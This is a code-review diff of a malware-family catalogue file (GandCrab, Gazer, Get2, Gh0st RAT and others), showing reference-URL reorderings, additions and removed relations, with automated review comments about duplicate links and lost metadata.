+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-different-ways-cook-crab-gandcrab-ransomware-service-raas-analysed-indepth/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://krebsonsecurity.com/2019/07/whos-behind-the-gandcrab-ransomware/",
+ "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
+ "http://www.secureworks.com/research/threat-profiles/gold-garden",
+ "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
+ "https://hotforsecurity.bitdefender.com/blog/belarus-authorities-arrest-gandcrab-ransomware-operator-23860.html",
+ "https://news.sophos.com/en-us/2019/03/05/gandcrab-101-all-about-the-most-widely-distributed-ransomware-of-the-moment/",
+ "http://asec.ahnlab.com/1145",
+ "https://web.archive.org/web/20190331091056/https://myonlinesecurity.co.uk/fake-cdc-flu-pandemic-warning-delivers-gandcrab-5-2-ransomware/",
+ "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "https://labs.bitdefender.com/2019/06/good-riddance-gandcrab-were-still-fixing-the-mess-you-left-behind",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.scmagazine.com/home/security-news/ransomware/gandcrab-ransomware-operators-put-in-retirement-papers/",
+ "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/",
+ "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://isc.sans.edu/diary/23417",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/"
],
"synonyms": [
"GrandCrab"
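Review bot: One new reference (`https://asec.ahnlab.com/en/41450/`) is buried under roughly sixty lines of reordered URLs; the `-63 +64` hunk header confirms the net change is a single line. Since the list is being rewritten, this is the moment to dedupe it: `"https://www.secureworks.com/research/threat-profiles/gold-garden"` (kept as context) and `"http://www.secureworks.com/research/threat-profiles/gold-garden"` (re-added) are the same page with different schemes, and `"https://intel471.com/blog/a-brief-history-of-ta505"` and `"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/"` are the same article on two hostnames. Normalising scheme and host before comparing would remove both pairs.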
@@ -24139,12 +25589,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer",
- "https://github.com/eset/malware-ioc/tree/master/turla",
- "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
"https://securelist.com/shedding-skin-turlas-fresh-faces/88069/",
+ "https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html",
+ "https://www.youtube.com/watch?v=Pvzhtjl86wc",
+ "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html",
+ "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf",
"https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
- "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/turla",
"https://securelist.com/introducing-whitebear/81638/"
],
"synonyms": [
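Review bot: The added `https://pdfhost.io/v/F0@QElMu2_...` link is a third-party upload mirror of what its filename says is a Bitdefender Netrepser whitepaper; such mirrors disappear without notice and cannot be verified as unmodified, so the vendor-hosted URL should be cited instead (this entry already cites Bitdefender directly for the PAC paper). The two cocomelonc.github.io "malware-pers" posts are generic persistence tutorials; confirm they actually discuss Gazer rather than having been pulled in by a keyword match, as a tutorial reference dilutes a cluster that otherwise cites primary Turla research.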
@@ -24161,6 +25614,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
"https://bazaar.abuse.ch/browse/signature/GCleaner/"
],
"synonyms": [],
@@ -24187,8 +25641,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gdrive",
- "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/"
+ "https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf",
+ "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
+ "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/"
],
"synonyms": [
"DoomDrive",
@@ -24238,33 +25693,46 @@
"uuid": "e46ae329-a619-4cfc-8059-af326c11ee79",
"value": "GEMCUTTER"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.geminiduke",
+ "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f3a4863f-1acd-4476-a8c7-1d4c162426e0",
+ "value": "GeminiDuke"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.get2",
- "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://www.goggleheadedhacker.com/blog/post/13",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104",
"https://github.com/Tera0017/TAFOF-Unpacker",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
+ "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/",
+ "https://intel471.com/blog/ta505-get2-loader-malware-december-2020/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md"
+ "https://blog.intel471.com/2020/07/15/flowspec-ta505s-bulletproof-hoster-of-choice/",
+ "https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/cybercriminal%20groups/TA505/04-10-2019/Malware%20Analysis%2004-10-2019.md",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader"
],
"synonyms": [
"FRIENDSPEAK",
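Review bot: GeminiDuke is added with `"description": ""` although the only non-Malpedia reference is the F-Secure Dukes whitepaper, which describes the family in detail; a one-line summary should be filled in from it. In the Get2 block that follows, the refs are again a near-complete reorder, and the rewritten list keeps the duplicated Intel471 article under two hostnames (`https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` and `https://intel471.com/blog/a-brief-history-of-ta505`); one of them should go.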
@@ -24285,15 +25753,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5abd7dee-cca1-4bee-9b82-da3f9be2970b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6f155c95-3090-4730-8d3b-0b246162a83a",
"value": "GetMail"
},
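Review bot: Deleting the `related` block silently drops the `similar` relationship from GetMail to `5abd7dee-cca1-4bee-9b82-da3f9be2970b`, and nothing in the hunk says whether that target cluster was retired or the relation was judged wrong. Relations are hand-curated and not derived from Malpedia, so if the exporter simply stopped emitting `related` they should be preserved across regeneration; if the removal is intentional, the commit message should say so and the reason should be recorded.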
@@ -24303,11 +25762,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass",
"https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2015-01-08-getmypass-point-of-sale-malware-update.md",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/",
- "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
- "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md"
+ "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-26-getmypass-point-of-sale-malware.md",
+ "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/"
],
"synonyms": [
"getmypos"
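Review bot: Another pure permutation (the four removed URLs are the four added ones), but the rewritten list still cites the same two articles twice: `https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html` and `https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html` are the rendered versions of the `github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/...` markdown sources listed alongside them. Keep the rendered blog URLs and drop the raw source links.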
@@ -24331,11 +25790,12 @@
"value": "get_pwd"
},
{
- "description": "",
+ "description": "Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gh0sttimes",
- "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html"
+ "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -24343,14 +25803,27 @@
"uuid": "9c89baf1-9639-4990-b218-14680170944f",
"value": "Gh0stTimes"
},
+ {
+ "description": "According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghambar",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4b9216e7-3a64-4b2e-97fd-54697d87cb72",
+ "value": "GHAMBAR"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole",
+ "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf",
"http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf",
- "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/",
- "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf"
+ "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/"
],
"synonyms": [
"CoreImpact (Modified)",
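Review bot: The GHAMBAR entry's only non-Malpedia reference is `https://www.mandiant.com/media/17826`, an opaque asset id that tells the reader nothing about which report it is; since the description opens with "According to Mandiant", the report's title or its landing-page URL should be cited so the claim can be checked. In the Ghole block below, the trendmicro whitepaper is cited twice under two hosts (`documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf` and `www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf`); the reorder would be a good moment to keep one.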
@@ -24358,15 +25831,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "43a0d8a7-558d-4104-8a24-55e6e7a503db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd",
"value": "Ghole"
},
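Review bot: The `similar` relation from Ghole to `43a0d8a7-558d-4104-8a24-55e6e7a503db` is removed without explanation, the same pattern as the GetMail hunk above. If the target cluster still exists this is a data loss introduced by the regeneration rather than a curation decision, and the block should be restored.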
@@ -24375,9 +25839,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostemperor",
- "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit",
+ "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/",
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/30094337/GhostEmperor_technical-details_PDF_eng.pdf",
- "https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/"
+ "https://www.kaspersky.com/about/press-releases/2021_ghostemperor-chinese-speaking-apt-targets-high-profile-victims-using-unknown-rootkit"
],
"synonyms": [],
"type": []
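Review bot: The three GhostEmperor references are merely swapped around (the kaspersky press release and the securelist article trade places); no content changes, so this hunk is ordering noise that a stable sort in the exporter would eliminate.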
@@ -24390,10 +25854,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet",
- "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html",
"https://documents.trendmicro.com/assets/wp/wp-detecting-apt-activity-with-network-traffic-analysis.pdf",
"https://www.nartv.org/2019/03/28/10-years-since-ghostnet/",
- "https://en.wikipedia.org/wiki/GhostNet"
+ "https://en.wikipedia.org/wiki/GhostNet",
+ "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html"
],
"synonyms": [
"Remosh"
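Review bot: The contagiodump link is moved from first to last position in the GhostNet refs and nothing else changes; same ordering-churn issue as the other permuted hunks.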
@@ -24408,23 +25872,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html",
- "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/"
+ "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html"
],
"synonyms": [
"Ghost iBot"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a68f1b43-c742-4f90-974d-2e74ec703e44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "6201c337-1599-4ced-be9e-651a624c20be",
"value": "GhostAdmin"
},
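Review bot: Besides swapping the order of the cylance and bleepingcomputer links, this hunk deletes the `similar` relation from GhostAdmin to `a68f1b43-c742-4f90-974d-2e74ec703e44`. Together with the GetMail and Ghole hunks, that is three curated relations dropped in one regeneration, which points to the exporter no longer carrying `related` through rather than to three independent editorial decisions; this should be checked before merge.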
@@ -24433,68 +25888,71 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
- "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
- "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf",
- "https://risky.biz/whatiswinnti/",
+ "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
+ "https://attack.mitre.org/groups/G0096",
+ "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf",
+ "https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/",
"https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
- "https://s.tencent.com/research/report/836.html",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://attack.mitre.org/groups/G0026",
- "https://www.secureworks.com/research/threat-profiles/bronze-edison",
- "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
- "https://www.intezer.com/blog/malware-analysis/chinaz-relations/",
+ "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html",
+ "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html",
"https://asec.ahnlab.com/en/32572/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
- "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits",
+ "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2",
+ "https://risky.biz/whatiswinnti/",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
+ "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
"https://blog.cylance.com/the-ghost-dragon",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
- "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html",
+ "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
"https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
- "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
- "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "http://www.nartv.org/mirror/ghostnet.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
"https://attack.mitre.org/groups/G0011",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/",
- "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf",
- "https://www.intezer.com/blog-chinaz-relations/",
- "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/",
- "https://blog.prevailion.com/2020/06/the-gh0st-remains-same8.html",
- "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack",
- "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/",
- "http://www.malware-traffic-analysis.net/2018/01/04/index.html",
- "https://medium.com/insomniacs/what-happened-between-the-bigbadwolf-and-the-tiger-925549a105b2",
- "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf",
- "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
- "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
- "https://www.secureworks.com/research/threat-profiles/bronze-globe",
- "https://blog.talosintelligence.com/2019/09/panda-evolution.html",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
"https://www.secureworks.com/research/threat-profiles/bronze-fleetwood",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/",
- "https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
- "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://thehackernews.com/2022/04/chinese-hackers-target-vmware-horizon.html",
- "http://www.nartv.org/mirror/ghostnet.pdf",
- "https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html",
- "http://www.hexblog.com/?p=1248",
- "https://attack.mitre.org/groups/G0096",
+ "https://blog.talosintelligence.com/2019/09/panda-evolution.html",
+ "https://www.trendmicro.com/en_us/research/21/d/water-pamola-attacked-online-shops-via-malicious-orders.html",
+ "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf",
+ "https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html",
"https://www.seqrite.com/blog/rat-used-by-chinese-cyberspies-infiltrating-indian-businesses/",
- "https://documents.trendmicro.com/assets/Appendix_Water-Pamola-Attacked-Online-Shops-Via-Malicious-Orders.pdf",
- "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
- "https://www.prevailion.com/the-gh0st-remains-the-same-2/"
+ "https://www.bitdefender.com/files/News/CaseStudies/study/185/Bitdefender-Business-2017-WhitePaper-PZCHAO-crea2452-en-EN-GenericUse.pdf",
+ "https://attack.mitre.org/groups/G0026",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia",
+ "https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits",
+ "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new",
+ "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/",
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-edison",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://www.datanet.co.kr/news/articleView.html?idxno=133346",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://blogs.jpcert.or.jp/en/2021/10/gh0sttimes.html",
+ "https://unit42.paloaltonetworks.com/atoms/iron-taurus/",
+ "https://www.prevailion.com/the-gh0st-remains-the-same-2/",
+ "http://www.hexblog.com/?p=1248",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
+ "https://www.intezer.com/blog/malware-analysis/chinaz-relations/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-globe",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf",
+ "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report",
+ "https://www.intezer.com/blog-chinaz-relations/",
+ "https://web.archive.org/web/20140816135909/https://www.symantec.com/connect/blogs/inside-back-door-attack",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/",
+ "https://web.archive.org/web/20170311192337/http://download01.norman.no:80/documents/ThemanyfacesofGh0stRat.pdf",
+ "http://www.malware-traffic-analysis.net/2018/01/04/index.html",
+ "https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/",
+ "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf",
+ "https://s.tencent.com/research/report/836.html",
